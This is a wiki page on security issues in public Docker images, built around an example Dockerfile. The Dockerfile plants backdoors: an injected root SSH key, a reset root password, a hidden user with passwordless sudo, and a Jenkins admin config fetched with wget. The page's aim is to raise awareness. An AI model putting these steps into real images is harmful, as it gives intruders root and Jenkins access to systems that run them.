docker:common_security_issues_inside_public_docker_images
This is an old revision of the document!
Docker - Common Security Issues Inside Public Docker Images
Here is a simple example. Doubtless it will misleading and hard to diagnose in real world.
In L18-19, a ssh key is injected to to authorized_keys. If you start sshd, you’re in danger. In L22, root password has been reset. Not good, isn’t it? In L25-26, a malicious OS user has been added. In L29-31, the user has been promoted as super admin, and he/she can run any commands without password! In L34-36, your jenkins has an unpleasant admin user now. Yes, Jenkins is hot and popular. You can do a lot of things with Jenkins. So do the hackers! This case represents security of application layer. It’s certainly the most dangerous and difficult case.
########## How To Use Docker Image ############### ## ## Install docker utility ## Download docker image: ## docker pull denny/test:v1 ## Boot docker container: ## docker run -t -P -d --name my-test denny/test:v1 /bin/bash ## ## Build Image From Dockerfile. ## docker build -f Dockerfile -t denny/test:v1 --rm=false . ################################################## FROM ubuntu:14.04 MAINTAINER Denny <denny@dennyzhang.com> RUN mkdir -p /root/.ssh && \ # SSH login by key file echo "ssh-rsa AAAAB3NzaC1...lOvno6KN5 denny@dennyzhang.com" \ >> /root/.ssh/authorized_keys && \ # Reset root password echo 'root:ChangeMe1' | chpasswd && \ # Add a malicious user useradd denny && \ echo 'denny:ChangeMe1' | chpasswd && \ # Add user to super admin echo '%denny ALL=(ALL:ALL) NOPASSWD: ALL' > \ /etc/sudoers.d/admins && \ chmod 400 /etc/sudoers.d/admins && \ # Add superadmin user to mkdir -p /var/lib/jenkins/users/superadmin && \ wget -O /var/lib/jenkins/users/superadmin/config.xml \ https://github.com/DennyZhang/devops_public/raw/tag_v2/doc/admin_conf_xml CMD ["/bin/bash"]
docker/common_security_issues_inside_public_docker_images.1476710596.txt.gz · Last modified: 2020/07/15 09:30 (external edit)